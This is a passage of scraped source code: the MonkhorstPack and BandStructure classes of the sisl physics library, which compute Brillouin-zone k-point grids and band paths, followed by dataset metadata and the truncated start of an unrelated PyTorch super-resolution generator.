must be of values :math:`]0 ; 1]`. 
Defaults to the entire BZ.\n Note that this will also reduce the weights such that the weights\n are normalized to the entire BZ.\n centered : bool, optional\n whether the k-points are :math:`\\Gamma`-centered (for zero displacement)\n trs : bool, optional\n whether time-reversal symmetry exists in the Brillouin zone.\n\n Examples\n --------\n >>> lattice = Lattice(3.)\n >>> MonkhorstPack(lattice, 10) # 10 x 10 x 10 (with TRS)\n >>> MonkhorstPack(lattice, [10, 5, 5]) # 10 x 5 x 5 (with TRS)\n >>> MonkhorstPack(lattice, [10, 5, 5], trs=False) # 10 x 5 x 5 (without TRS)\n \"\"\"\n\n def __init__(\n self, parent, nkpt, displacement=None, size=None, centered=True, trs=True\n ):\n super().__init__(parent)\n\n if isinstance(nkpt, Integral):\n nkpt = np.diag([nkpt] * 3)\n elif isinstance(nkpt[0], Integral):\n nkpt = np.diag(nkpt)\n\n # Now we have a matrix of k-points\n if np.any(nkpt - np.diag(np.diag(nkpt)) != 0):\n raise NotImplementedError(\n f\"{self.__class__.__name__} with off-diagonal components is not implemented yet\"\n )\n\n if displacement is None:\n displacement = np.zeros(3, np.float64)\n elif isinstance(displacement, Real):\n displacement = _a.fulld(3, displacement)\n else:\n # transfer the displacement to the primitive cell\n displacement = _a.asarrayd(displacement)\n displacement = self.in_primitive(displacement)\n\n if size is None:\n size = _a.onesd(3)\n elif isinstance(size, Real):\n size = _a.fulld(3, size)\n else:\n size = _a.asarrayd(size)\n\n # Retrieve the diagonal number of values\n Dn = np.diag(nkpt).astype(np.int32)\n if np.any(Dn == 0):\n raise ValueError(\n f\"{self.__class__.__name__} *must* be initialized with \"\n \"diagonal elements different from 0.\"\n )\n\n i_trs = -1\n if trs:\n # Figure out which direction to TRS\n nmax = 0\n for i in [0, 1, 2]:\n if displacement[i] in [0.0, 0.5] and Dn[i] > nmax:\n nmax = Dn[i]\n i_trs = i\n if nmax == 1:\n i_trs = -1\n if i_trs == -1:\n # If we still haven't decided (say for weird displacements)\n # simply take the one with the maximum number of k-points.\n i_trs = np.argmax(Dn)\n\n # Calculate k-points and weights along all directions\n kw = [\n self.grid(Dn[i], displacement[i], size[i], centered, i == i_trs)\n for i in (0, 1, 2)\n ]\n\n # Now figure out if we have a 0 point along the TRS direction\n if trs:\n # Figure out if the first value is zero\n if abs(kw[i_trs][0][0]) < 1e-10:\n # Find indices we want to delete\n ik1, ik2 = (i_trs + 1) % 3, (i_trs + 2) % 3\n k1, k2 = kw[ik1][0], kw[ik2][0]\n k_dup = _a.emptyd([k1.size, k2.size, 2])\n k_dup[:, :, 0] = k1.reshape(-1, 1)\n k_dup[:, :, 1] = k2.reshape(1, -1)\n # Figure out the duplicate values\n # To do this we calculate the norm matrix\n # Note for a 100 x 100 k-point sampling this will produce\n # a 100 ^ 4 matrix ~ 93 MB\n # For larger k-point samplings this is probably not so good (300x300 -> 7.5 GB)\n k_dup = k_dup.reshape(k1.size, k2.size, 1, 1, 2) + k_dup.reshape(\n 1, 1, k1.size, k2.size, 2\n )\n k_dup = (\n (k_dup[..., 0] ** 2 + k_dup[..., 1] ** 2) ** 0.5 < 1e-10\n ).nonzero()\n # At this point we have found all duplicate points; to only keep one\n # of each pair we take the lower half\n # Also, the Gamma point is *always* zero, so we shouldn't do <=!\n # Now check the case where one of the directions is (only) the Gamma-point\n if kw[ik1][0].size == 1 and kw[ik1][0][0] == 0.0:\n # We keep all indices for the ik1 direction (since it is the Gamma-point)!\n rel = (k_dup[1] > k_dup[3]).nonzero()[0]\n elif kw[ik2][0].size == 1 and kw[ik2][0][0] == 0.0:
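\n # (mirror of the branch above: here the ik2 direction contains only the Gamma-point)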
\n # We keep all indices for the ik2 direction (since it is the Gamma-point)!\n rel = (k_dup[0] > k_dup[2]).nonzero()[0]\n else:\n rel = np.logical_and(k_dup[0] > k_dup[2], k_dup[1] > k_dup[3])\n k_dup = (k_dup[0][rel], k_dup[1][rel], k_dup[2][rel], k_dup[3][rel])\n del rel, k1, k2\n else:\n # To signal we can't do this\n k_dup = None\n\n self._k = _a.emptyd((kw[0][0].size, kw[1][0].size, kw[2][0].size, 3))\n self._w = _a.onesd(self._k.shape[:-1])\n for i in (0, 1, 2):\n k = kw[i][0].reshape(-1, 1, 1)\n w = kw[i][1].reshape(-1, 1, 1)\n self._k[..., i] = np.rollaxis(k, 0, i + 1)\n self._w[...] *= np.rollaxis(w, 0, i + 1)\n\n del kw\n # Now clean up a few of the points\n if trs and k_dup is not None:\n # Create the correct indices in the ravelled indices\n k = [0] * 3\n k[ik1] = k_dup[2]\n k[ik2] = k_dup[3]\n k_del = np.ravel_multi_index(tuple(k), self._k.shape[:-1])\n k[ik1] = k_dup[0]\n k[ik2] = k_dup[1]\n k_dup = np.ravel_multi_index(tuple(k), self._k.shape[:-1])\n del k\n\n self._k.shape = (-1, 3)\n self._w.shape = (-1,)\n\n if trs and k_dup is not None:\n self._k = np.delete(self._k, k_del, 0)\n self._w[k_dup] += self._w[k_del]\n self._w = np.delete(self._w, k_del)\n del k_dup, k_del\n\n # Store information regarding size and diagonal elements\n # This information is basically only necessary when\n # we want to replace special k-points\n self._diag = Dn # vector\n self._displ = displacement # vector\n self._size = size # vector\n self._centered = centered\n self._trs = i_trs\n\n @property\n def displacement(self):\n \"\"\"Displacement for this Monkhorst-Pack grid\"\"\"\n return self._displ\n\n def __str__(self):\n \"\"\"String representation of `MonkhorstPack`\"\"\"\n if isinstance(self.parent, Lattice):\n p = self.parent\n else:\n p = self.parent.lattice\n return (\n \"{cls}{{nk: {nk:d}, size: [{size[0]:.5f} {size[1]:.5f} {size[2]:.5f}], trs: {trs},\"\n \"\\n diagonal: [{diag[0]:d} {diag[1]:d} {diag[2]:d}], displacement: [{disp[0]:.5f} {disp[1]:.5f} {disp[2]:.5f}],\"\n \"\\n {lattice}\\n}}\"\n ).format(\n cls=self.__class__.__name__,\n nk=len(self),\n size=self._size,\n trs={0: \"A\", 1: \"B\", 2: \"C\"}.get(self._trs, \"no\"),\n diag=self._diag,\n disp=self._displ,\n lattice=str(p).replace(\"\\n\", \"\\n \"),\n )\n\n def __getstate__(self):\n \"\"\"Return dictionary with the current state\"\"\"\n state = super().__getstate__()\n state[\"diag\"] = self._diag\n state[\"displ\"] = self._displ\n state[\"size\"] = self._size\n state[\"centered\"] = self._centered\n state[\"trs\"] = self._trs\n return state\n\n def __setstate__(self, state):\n \"\"\"Reset state of the object\"\"\"\n super().__setstate__(state)\n self._diag = state[\"diag\"]\n self._displ = state[\"displ\"]\n self._size = state[\"size\"]\n self._centered = state[\"centered\"]\n self._trs = state[\"trs\"]\n\n def copy(self, parent=None):\n \"\"\"Create a copy of this object, optionally changing the parent\n\n Parameters\n ----------\n parent : optional\n change the parent\n \"\"\"\n if parent is None:\n parent = self.parent\n bz = self.__class__(\n parent, self._diag, self._displ, self._size, self._centered, self._trs >= 0\n )\n # this is required due to replace calls\n bz._k = self._k.copy()\n bz._w = self._w.copy()\n return bz\n\n @classmethod\n def grid(cls, n, displ=0.0, size=1.0, centered=True, trs=False):\n r\"\"\"Create a grid of `n` points with an offset of `displ` and sampling `size` around `displ`\n\n The :math:`k`-points are :math:`\\Gamma` centered.\n\n Parameters\n ----------\n n : int\n number of points in the grid.
 If `trs` is ``True`` this may be smaller than `n`\n displ : float, optional\n the displacement of the grid\n size : float, optional\n the total size of the Brillouin zone to sample\n centered : bool, optional\n if the points are centered\n trs : bool, optional\n whether time-reversal-symmetry is applied\n\n Returns\n -------\n k : numpy.ndarray\n the list of k-points in the Brillouin zone to be sampled\n w : numpy.ndarray\n weights for the k-points\n \"\"\"\n # First ensure that displ is in the Brillouin zone\n displ = displ % 1.0\n if displ > 0.5:\n displ -= 1.0\n if displ < -0.5:\n displ += 1.0\n\n # Centered _only_ has effect IFF\n # displ == 0. and size == 1\n # Otherwise we resort to other schemes\n if displ != 0.0 or size != 1.0:\n centered = False\n\n # size *per k-point*\n dsize = size / n\n\n # We create the full grid, then afterwards we figure out TRS\n n_half = n // 2\n if n % 2 == 1:\n k = _a.aranged(-n_half, n_half + 1) * dsize + displ\n else:\n k = _a.aranged(-n_half, n_half) * dsize + displ\n if not centered:\n # Shift everything by half the size each occupies\n k += dsize / 2\n\n # Move k to the primitive cell and generate weights\n k = cls.in_primitive(k)\n w = _a.fulld(n, dsize)\n\n # Check for TRS points\n if trs and np.any(k < 0.0):\n # Make all positive to remove the double counting terms\n k_pos = np.fabs(k)\n\n # Sort k-points and weights\n idx = argsort(k_pos)\n\n # Re-arrange according to k value\n k_pos = k_pos[idx]\n w = w[idx]\n\n # Find indices of all equivalent k-points (tolerance of 1e-10 in reciprocal units)\n # Use the dsize to estimate the difference in positions\n idx_same = (np.diff(k_pos) < dsize * 1e-3).nonzero()[0]\n\n # The above algorithm should never create more than two duplicates.\n # Hence we can simply remove all idx_same and double the weight for all\n # idx_same + 1.\n w[idx_same + 1] *= 2\n # Delete the duplicated k-points (they are already sorted)\n k = np.delete(k_pos, idx_same, axis=0)\n w = np.delete(w, idx_same)\n else:\n # Sort them, because it makes more visual sense\n idx = argsort(k)\n k = k[idx]\n w = w[idx]\n\n # Return values\n return k, w\n\n def replace(self, k, mp, displacement=False, as_index=False, check_vol=True):\n r\"\"\"Replace a k-point with a new set of k-points from a Monkhorst-Pack grid\n\n This method tries to replace an area corresponding to `mp.size` around the k-point `k`\n such that the k-points inside that area are replaced.\n This enables one to zoom in on specific points in the Brillouin zone for detailed analysis.\n\n Parameters\n ----------\n k : array_like\n k-point in this object to replace, if `as_index` is true, it will be regarded as integer\n positions of the k-points to replace, otherwise the indices of the k-points will be located\n individually (in chunks of 200 MB).\n mp : MonkhorstPack\n object containing the replacement k-points.\n displacement : array_like or bool, optional\n the displacement of the `mp` k-points. Needed for doing *lots* of replacements due to efficiency.\n Defaults to not displace anything. The inserted k-points will be `mp.k + displacement`.\n If True, it will use `k` as the displacement vector. For multiple k-point replacements\n each k-point will be replaced by `mp` with k as the displacement.\n as_index : bool, optional\n whether `k` is input as reciprocal k-points, or as indices of k-points in this object.\n check_vol : bool, optional\n whether to check the volume of the replaced k-point(s); by default the volume of each k-point\n is determined by the original ``size`` and ``nkpt`` values.
 However, when doing\n replacements of k-points these values are not kept for the individual k-points\n that were replaced, so subsequent replacements of these points will raise errors that\n are effectively spurious.\n\n Examples\n --------\n\n This example creates a zoomed-in view of the :math:`\\Gamma`-point by replacing it with\n a 3x3x3 Monkhorst-Pack grid.\n\n >>> lattice = Lattice(1.)\n >>> mp = MonkhorstPack(lattice, [3, 3, 3])\n >>> mp.replace([0, 0, 0], MonkhorstPack(lattice, [3, 3, 3], size=1./3))\n\n This example creates a zoomed-in view of the :math:`\\Gamma`-point by replacing it with\n a 4x4x4 Monkhorst-Pack grid.\n\n >>> lattice = Lattice(1.)\n >>> mp = MonkhorstPack(lattice, [3, 3, 3])\n >>> mp.replace([0, 0, 0], MonkhorstPack(lattice, [4, 4, 4], size=1./3))\n\n This example creates a zoomed-in view of the :math:`\\Gamma`-point by replacing it with\n a 4x4x1 Monkhorst-Pack grid.\n\n >>> lattice = Lattice(1.)\n >>> mp = MonkhorstPack(lattice, [3, 3, 3])\n >>> mp.replace([0, 0, 0], MonkhorstPack(lattice, [4, 4, 1], size=1./3))\n\n Raises\n ------\n SislError\n if the size of the replacement `MonkhorstPack` grid is not compatible with the k-point spacing in this object.\n \"\"\"\n # First we find all k-points within k +- mp.size\n # Those are the points we wish to remove.\n # Secondly we need to ensure that the k-points we remove are occupying *exactly*\n # the Brillouin zone we wish to replace.\n if not isinstance(mp, MonkhorstPack):\n raise ValueError(\"Object 'mp' is not a MonkhorstPack object\")\n\n if check_vol:\n # We can easily figure out the BZ that each k-point is averaging\n k_vol = self._size / self._diag\n\n # Compare against the size of this one\n # Since we can remove more than one k-point, we require that the\n # size of the replacement MP is an integer multiple of the\n # k-point volumes.\n k_int = mp._size / k_vol\n if not np.allclose(np.rint(k_int), k_int):\n raise SislError(\n f\"{self.__class__.__name__}.reduce could not replace k-point, BZ \"\n \"volume replaced is not equivalent to the inherent k-point volume.\"\n )\n\n # the size of the k-points that will be added\n s_size2 = self._size / 2\n mp_size2 = mp._size / 2\n dk = np.where(mp_size2 < s_size2, mp_size2, s_size2)\n dk.shape = (1, 3)\n\n # determine indices of k-point inputs\n k = np.asarray(k)\n\n if as_index:\n idx = k.ravel()\n k = self.k[idx]\n else:\n # find k-points in batches of 200 MB\n k = self.in_primitive(k).reshape(-1, 3)\n idx = batched_indices(\n self.k, k, atol=dk, batch_size=200, diff_func=self.in_primitive\n )[0]\n if (\n self._trs >= 0\n ): # TRS along a given axis, we can search the mirrored values\n idx2 = batched_indices(\n self.k, -k, atol=dk, batch_size=200, diff_func=self.in_primitive\n )[0]\n idx = np.concatenate((idx, idx2))\n # we may find 2 indices for the Gamma-point in this case... not useful\n idx = np.unique(idx)\n\n if len(idx) == 0:\n raise SislError(\n f\"{self.__class__.__name__}.reduce found no k-points to replace. \"\n f\"Searched with precision: {dk.ravel()}\"\n )\n\n # Idea of fast replacements is attributed to @ahkole in #454, but the resulting code needed some\n # changes since that code was not stable against *wrong input*, i.e.
 k=[0, 0, 0]\n # replacements.\n\n # determine the displacement vector\n if isinstance(displacement, bool):\n if displacement:\n displacement = k\n else:\n displacement = None\n\n elif displacement is not None:\n # convert to array\n displacement = _a.asarray(displacement).reshape(-1, 3)\n\n if displacement is None:\n displ_nk = 1\n else:\n # Ensure we are in the central k-grid\n displacement = self.in_primitive(displacement)\n displ_nk = len(displacement)\n\n # Now we have the k-points we need to remove\n # Figure out if the total weight is consistent\n total_weight = self.weight[idx].sum()\n replace_weight = mp.weight.sum() * displ_nk\n atol = min(total_weight, replace_weight) * 1e-4\n if abs(total_weight - replace_weight) < atol:\n weight_factor = 1.0\n elif abs(total_weight - replace_weight * 2) < atol:\n weight_factor = 2.0\n if self._trs < 0:\n info(\n f\"{self.__class__.__name__}.reduce assumes that the replaced k-point has double weights.\"\n )\n else:\n # print(\"k-point to replace: \", k.ravel())\n # print(\"delta-k: \", dk.ravel())\n # print(\"Found k-indices that will be replaced:\")\n # print(idx)\n # print(\"k-points replaced:\")\n # print(self.k[idx, :])\n # print(\"weights replaced:\")\n # print(self.weight[idx])\n # print(self.weight.min(), self.weight.max())\n # print(mp.weight.min(), mp.weight.max())\n # print(\"Summed weights vs. replaced summed weights: \")\n # print(total_weight, replace_weight)\n # print(mp)\n raise SislError(\n f\"{self.__class__.__name__}.reduce found inconsistent replacement weights \"\n f\"self={total_weight} vs. mp={replace_weight}. \"\n f\"Replacement indices: {idx}.\"\n )\n\n # delete and append new k-points and weights\n if displacement is None:\n self._k = np.concatenate((np.delete(self._k, idx, axis=0), mp._k), axis=0)\n else:\n self._k = np.concatenate(\n (\n np.delete(self._k, idx, axis=0),\n self.in_primitive(mp.k + displacement.reshape(-1, 1, 3)).reshape(\n -1, 3\n ),\n ),\n axis=0,\n )\n self._w = np.concatenate(\n (np.delete(self._w, idx), np.tile(mp._w * weight_factor, displ_nk))\n )\n\n\n@set_module(\"sisl.physics\")\nclass BandStructure(BrillouinZone):\n \"\"\"Create a path in the Brillouin zone for plotting band-structures etc.\n\n Parameters\n ----------\n parent : object or array_like\n An object with associated `parent.cell` and `parent.rcell` or\n an array of floats which may be turned into a `Lattice`\n points : array_like of float\n a list of points that are the *corners* of the path\n divisions : int or array_like of int\n number of divisions in each segment.\n If a single integer is passed it is the total number\n of points on the path (equally separated).\n If it is an array_like input it must have length one\n less than `points`; in this case the total number of points\n will be ``sum(divisions) + 1`` due to the end-point constraint.\n names : array_like of str\n the associated names of the points on the Brillouin Zone path\n jump_dk: float or array_like, optional\n Percentage of ``self.lineark()[-1]`` that is used as separation between discontinued\n jumps in the band-structure.\n For band-structures with disconnected jumps the `lineark` and `lineartick` methods\n return a separation between the disconnected points according to this percentage.\n Default value is 5% of the total distance.
 Alternatively an array equal to the\n number of discontinuity jumps may be passed for individual percentages.\n Keyword-only argument.\n\n Examples\n --------\n >>> lattice = Lattice(10)\n >>> bs = BandStructure(lattice, [[0] * 3, [0.5] * 3], 200)\n >>> bs = BandStructure(lattice, [[0] * 3, [0.5] * 3, [1.] * 3], 200)\n >>> bs = BandStructure(lattice, [[0] * 3, [0.5] * 3, [1.] * 3], 200, ['Gamma', 'M', 'Gamma'])\n\n A disconnected band structure may be created by either having a point of 0 length, or None.\n Note that the number of names does not contain the empty points (they are simply removed).\n Such a band-structure may be useful when one is not interested in a fully connected band structure.\n\n >>> bs = BandStructure(lattice, [[0, 0, 0], [0, 0.5, 0], None, [0.5, 0, 0], [0.5, 0.5, 0]], 200)\n \"\"\"\n\n @deprecate_argument(\n \"name\",\n \"names\",\n \"argument 'name' has been deprecated in favor of 'names', please update your code.\",\n \"0.15.0\",\n )\n def __init__(self, parent, *args, **kwargs):\n # points, divisions, names=None):\n super().__init__(parent)\n\n points = kwargs.pop(\"points\", None)\n if points is None:\n if len(args) > 0:\n points, *args = args\n else:\n raise ValueError(f\"{self.__class__.__name__} 'points' argument missing\")\n\n divisions = kwargs.pop(\"divisions\", None)\n if divisions is None:\n if len(args) > 0:\n divisions, *args = args\n else:\n raise ValueError(\n f\"{self.__class__.__name__} 'divisions' argument missing\"\n )\n\n names = kwargs.pop(\"names\", None)\n if names is None:\n if len(args) > 0:\n names, *args = args\n\n if len(args) > 0:\n raise ValueError(\n f\"{self.__class__.__name__} unknown arguments after parsing 'points', 'divisions' and 'names': {args}\"\n )\n\n # Store empty split size\n self._jump_dk = np.asarray(kwargs.pop(\"jump_dk\", 0.05))\n\n if len(kwargs) > 0:\n raise ValueError(\n f\"{self.__class__.__name__} unknown keyword arguments after parsing [points, divisions, names, jump_dk]: {list(kwargs.keys())}\"\n )\n\n # Copy over points\n # Check if any of the points is None or has length 0\n # In that case it is a disconnected path\n def is_empty(ix):\n try:\n return len(ix[1]) == 0\n except Exception:\n return ix[1] is None\n\n # filter out jump directions\n jump_idx = _a.arrayi([i for i, _ in filter(is_empty, enumerate(points))])\n\n # store only *valid* points\n self.points = _a.arrayd([p for i, p in enumerate(points) if i not in jump_idx])\n\n # remove erroneous jumps\n if len(points) - 1 in jump_idx:\n jump_idx = jump_idx[:-1]\n if 0 in jump_idx:\n jump_idx = jump_idx[1:]\n\n if self._jump_dk.size > 1 and jump_idx.size != self._jump_dk.size:\n raise ValueError(\n f\"{self.__class__.__name__} got inconsistent argument lengths (jump_dk does not match jumps in points)\"\n )\n\n # The jump-idx is equal to using np.split(self.points, jump_idx)\n # which then returns continuous sections\n # correct for removed indices\n jump_idx -= np.arange(len(jump_idx))\n self._jump_idx = jump_idx\n\n # If the array has fewer than 3 columns we try to determine the non-periodic directions\n if self.points.shape[1] < 3:\n if self.points.shape[1] != np.sum(self.parent.nsc > 1):\n raise ValueError(\"Could not determine the non-periodic direction\")\n\n # fix the points where there is no periodicity\n for i in (0, 1, 2):\n if self.parent.nsc[i] == 1:\n self.points = np.insert(self.points, i, 0.0, axis=1)\n\n # Ensure the shape is correct\n self.points.shape = (-1, 3)\n\n # Now figure out what to do with the divisions\n if isinstance(divisions, Integral):\n if divisions <
 len(self.points):\n raise ValueError(\n f\"Cannot evenly split {len(self.points)} points into {divisions} divisions, ensure divisions >= len(points)\"\n )\n\n # Get length between different k-points with a total length\n # of divisions\n dists = np.diff(\n linspace_bz(self.tocartesian(self.points), jumps=jump_idx, jump_dk=0.0)\n )\n\n # Get floating point divisions\n divs_r = dists * divisions / dists.sum()\n # Convert to integers\n divs = np.rint(divs_r).astype(np.int32)\n # ensure at least 1 point along each division\n # 1 division means only the starting point\n divs[divs == 0] = 1\n divs[jump_idx - 1] = 1\n divs_sum = divs.sum()\n while divs_sum != divisions - 1:\n # only check indices where divs > 1\n idx = (divs > 1).nonzero()[0]\n dk = dists[idx] / divs[idx]\n if divs_sum >= divisions:\n divs[idx[np.argmin(dk)]] -= 1\n else:\n divs[idx[np.argmax(dk)]] += 1\n divs_sum = divs.sum()\n\n divisions = divs[:]\n\n elif len(divisions) + 1 != len(self.points):\n raise ValueError(\n f\"inconsistent number of elements in 'points' and 'divisions' argument; 'divisions' must have exactly one element less than 'points'.\"\n )\n\n self.divisions = _a.arrayi(divisions).ravel()\n\n if names is None:\n self.names = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"[: len(self.points)]\n else:\n self.names = names\n if len(self.names) != len(self.points):\n raise ValueError(\n f\"inconsistent number of elements in 'points' and 'names' argument\"\n )\n\n # Calculate points\n dpoint = np.diff(self.points, axis=0)\n k = _a.emptyd([self.divisions.sum() + 1, 3])\n i = 0\n for ik, (divs, dk) in enumerate(zip(self.divisions, dpoint)):\n k[i : i + divs, :] = (\n self.points[ik] + dk * _a.aranged(divs).reshape(-1, 1) / divs\n )\n i += divs\n k[-1] = self.points[-1]\n # sanity check that should always be obeyed\n assert i + 1 == len(k)\n\n self._k = k\n self._w = _a.fulld(len(self.k), 1 / len(self.k))\n\n def copy(self, parent=None):\n \"\"\"Create a copy of this object, optionally changing the parent\n\n Parameters\n ----------\n parent : optional\n change the parent\n \"\"\"\n if parent is None:\n parent = self.parent\n bz = self.__class__(\n parent, self.points, self.divisions, self.names, jump_dk=self._jump_dk\n )\n return bz\n\n def __getstate__(self):\n \"\"\"Return dictionary with the current state\"\"\"\n state = super().__getstate__()\n state[\"points\"] = self.points.copy()\n state[\"divisions\"] = self.divisions.copy()\n state[\"jump_idx\"] = self._jump_idx.copy()\n state[\"names\"] = list(self.names)\n state[\"jump_dk\"] = self._jump_dk\n return state\n\n def __setstate__(self, state):\n \"\"\"Reset state of the object\"\"\"\n super().__setstate__(state)\n self.points = state[\"points\"]\n self.divisions = state[\"divisions\"]\n self.names = state[\"names\"]\n self._jump_dk = state[\"jump_dk\"]\n self._jump_idx = state[\"jump_idx\"]\n\n def insert_jump(self, *arrays, value=np.nan):\n \"\"\"Return a copy of `arrays` filled with `value` at indices of discontinuity jumps\n\n Arrays with `value` at the jumps are easier to plot since the lines are naturally discontinued.\n For band structures without discontinuity jumps in the Brillouin zone the `arrays` will\n be returned as-is.\n\n It will insert `value` along the first dimension matching the length of `self`.\n For each discontinuity jump an element will be inserted.\n\n This may be useful for plotting since `np.nan` gets interpreted as a discontinuity\n in the graph thus removing connections between the segments.\n\n Parameters\n ----------\n *arrays : array_like\n arrays will get `value` inserted where
 there are jumps in the band structure\n value : optional\n the value to be inserted at the jump points in the data array\n\n Examples\n --------\n Create a band structure with a discontinuity.\n\n >>> gr = geom.graphene()\n >>> bs = BandStructure(gr, [[0, 0, 0], [0.5, 0, 0], None, [0, 0, 0], [0, 0.5, 0]], 4)\n >>> data = np.zeros([len(bs), 10])\n >>> data_with_jump = bs.insert_jump(data)\n >>> assert data_with_jump.shape == (len(bs)+1, 10)\n >>> np.all(np.isnan(data_with_jump[2]))\n True\n \"\"\"\n # quick return if nothing needs changing\n if len(self._jump_idx) == 0:\n if len(arrays) == 1:\n return arrays[0]\n return arrays\n\n nk = len(self)\n full_jumps = np.cumsum(self.divisions)[self._jump_idx - 1]\n\n def _insert(array):\n array = np.asarray(array)\n # ensure dtype is equivalent to the input array\n nans = np.empty(len(full_jumps), dtype=array.dtype)\n nans.fill(value)\n axis = array.shape.index(nk)\n shape = list(1 for _ in array.shape)\n shape[axis] = -1\n return np.insert(array, full_jumps, nans.reshape(shape), axis=axis)\n\n # convert all\n arrays = tuple(_insert(array) for array in arrays)\n if len(arrays) == 1:\n return arrays[0]\n return arrays\n\n def lineartick(self):\n \"\"\"The tick-marks corresponding to the linear-k values\n\n Returns\n -------\n numpy.ndarray\n the positions in reciprocal space determined by the distance between points\n\n See Also\n --------\n lineark : Routine used to calculate the tick-marks.\n \"\"\"\n return self.lineark(True)[1:3]\n\n def tolinear(self, k, ret_index=False, tol=1e-4):\n \"\"\"Convert a k-point into the equivalent linear k-point via the distance\n\n Finds the index of the k-point in `self.k` that is closest to `k`.\n The returned value is then the equivalent index in `lineark`.\n\n This is very useful for extracting certain points along the band structure.\n\n Parameters\n ----------\n k : array_like\n the k-point(s) to locate in the linear values\n ret_index : bool, optional\n whether the indices are also returned\n tol : float, optional\n when the found k-point differs (in Cartesian coordinates) by more\n than `tol` a warning will be issued.\n The tolerance is in units 1/Ang.\n \"\"\"\n # Faster than doing sqrt all the time\n tol = tol**2\n # first convert to the cartesian coordinates (for proper distances)\n ks = self.tocartesian(np.atleast_2d(k))\n kk = self.tocartesian(self.k)\n\n # find closest values\n def find(k):\n dist = ((kk - k) ** 2).sum(-1)\n idx = np.argmin(dist)\n if dist[idx] > tol:\n warn(\n f\"{self.__class__.__name__}.tolinear could not find a k-point within given tolerance ({self.toreduced(k)})\"\n )\n return idx\n\n idxs = [find(k) for k in ks]\n if ret_index:\n return self.lineark()[idxs], idxs\n return self.lineark()[idxs]\n\n def lineark(self, ticks=False):\n \"\"\"A 1D array which corresponds to the delta-k values of the path\n\n This is mainly meant for plotting but may be useful for finding out\n distances in the reciprocal lattice.\n\n Examples\n --------\n\n >>> p = BandStructure(...)\n >>> eigs = Hamiltonian.eigh(p)\n >>> for i in range(len(Hamiltonian)):\n ... plt.plot(p.lineark(), eigs[:, i])\n\n >>> p = BandStructure(...)\n >>> eigs = Hamiltonian.eigh(p)\n >>> lk, kt, kl = p.lineark(True)\n >>> plt.xticks(kt, kl)\n >>> for i in range(len(Hamiltonian)):\n ...
 plt.plot(lk, eigs[:, i])\n\n Parameters\n ----------\n ticks : bool, optional\n if `True` the ticks for the points are also returned\n\n See Also\n --------\n linspace_bz : converts k-points into a linear distance parameterization\n\n Returns\n -------\n linear_k : numpy.ndarray\n the positions in reciprocal space determined by the distance between points\n ticks : numpy.ndarray\n linear k-positions of the points, only returned if `ticks` is ``True``\n ticklabels : list of str\n labels at `ticks`, only returned if `ticks` is ``True``\n \"\"\"\n cum_divs = np.cumsum(self.divisions)\n # Calculate points\n # First we also need to calculate the jumps\n dK = linspace_bz(\n self, jumps=cum_divs[self._jump_idx - 1], jump_dk=self._jump_dk\n )\n\n # Get label tick, in case self.names is a single string 'ABCD'\n if ticks:\n # Get number of points\n xtick = np.zeros(len(self.points), dtype=int)\n xtick[1:] = cum_divs\n # Ensure the returned label_tick is a copy\n return dK, dK[xtick], [a for a in self.names]\n return dK\n","repo_name":"zerothi/sisl","sub_path":"src/sisl/physics/brillouinzone.py","file_name":"brillouinzone.py","file_ext":"py","file_size_in_byte":59393,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"13357027053","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.utils import spectral_norm as sn\n\nclass BasicBlock(nn.Module):\n \"\"\"RESIDUAL block used by G\"\"\"\n def __init__(self, n_features):\n super().__init__()\n self.layers = nn.Sequential(\n sn(nn.Conv2d(in_channels=n_features, out_channels=n_features, kernel_size=3, stride=1, padding=1)),\n nn.BatchNorm2d(num_features=n_features),\n nn.PReLU(),\n sn(nn.Conv2d(in_channels=n_features, out_channels=n_features, kernel_size=3, stride=1, padding=1)),\n nn.BatchNorm2d(num_features=n_features))\n\n def forward(self, x):\n residual = x\n out = self.layers(x)\n return residual + out\n\n\nclass Generator(nn.Module):\n def __init__(self, n_blocks, n_features_block, n_features_last, list_scales, use_sn=False, input_channels=3):\n \"\"\"n_blocks, n_features : ~expressiveness of the model\n input_channels: number of colors at the input and the output\n list_scales: upscale factor of each stage (e.g. [2, 2] gives x4 pixels)\"\"\"\n super().__init__()\n \n assert n_features_last % 4 == 0\n self.n_features_last = n_features_last\n \n self.first_layers = nn.Sequential(\n sn(nn.Conv2d(in_channels=input_channels, out_channels=n_features_block, kernel_size=9, stride=1, padding=4)),\n nn.PReLU())\n \n self.block_list = nn.Sequential(*[BasicBlock(n_features_block) for _ in range(n_blocks)])\n \n self.block_list_end = nn.Sequential(\n sn(nn.Conv2d(in_channels=n_features_block, out_channels=n_features_block, kernel_size=3, stride=1, padding=1)),\n nn.BatchNorm2d(num_features=n_features_block),\n )\n \n if use_sn:\n self.upscale = nn.Sequential(*[\n nn.Sequential(sn(nn.Conv2d(in_channels=n_features_block if i==0 else n_features_last//list_scales[i-1]**2,\n out_channels=n_features_last, kernel_size=3, stride=1, padding=1)),\n nn.PixelShuffle(upscale_factor=list_scales[i]),\n nn.PReLU())\n for i in range(len(list_scales))])\n self.end = nn.Sequential(\n # output\n sn(nn.Conv2d(in_channels=n_features_last//list_scales[-1]**2, out_channels=input_channels, kernel_size=3, stride=1, padding=1)),\n nn.Tanh())\n else:\n self.upscale = nn.Sequential(*[\n nn.Sequential(nn.Conv2d(in_channels=n_features_block if i==0 else n_features_last//list_scales[i-1]**2,\n out_channels=n_features_last, kernel_size=3, stride=1,
 padding=1),\n nn.PixelShuffle(upscale_factor=list_scales[i]),\n nn.PReLU())\n for i in range(len(list_scales))])\n self.end = nn.Sequential(\n nn.Conv2d(in_channels=n_features_last//list_scales[-1]**2, out_channels=input_channels, kernel_size=3, stride=1, padding=1),\n nn.Tanh())\n \n def load_state_dict(self, state_dict, strict=False):\n super().load_state_dict(state_dict, strict=strict)\n \n a = self.state_dict()\n b = state_dict\n # noinspection PyTypeChecker\n if a.keys() != b.keys() or any(torch.any(a[k] != b[k]) for k in a.keys()): # keys or values differ\n n_param_a = sum([x.nelement() for x in a.values()]) # sum of the tensor sizes\n n_param_b = sum([x.nelement() for x in b.values()])\n n_param_inter = sum([a[x].nelement() for x in set(a.keys()) & set(b.keys())])\n print(\"generator loaded at \", round(n_param_inter / n_param_a * 100, 1), \"%\",\n \" (\", round(n_param_inter*1e-6, 2), \" M)\", sep=\"\")\n \n print(\" - architecture : \", len(a), \" weight sets (\", round(n_param_a*1e-6, 2), \" M)\", sep=\"\")\n print(\" 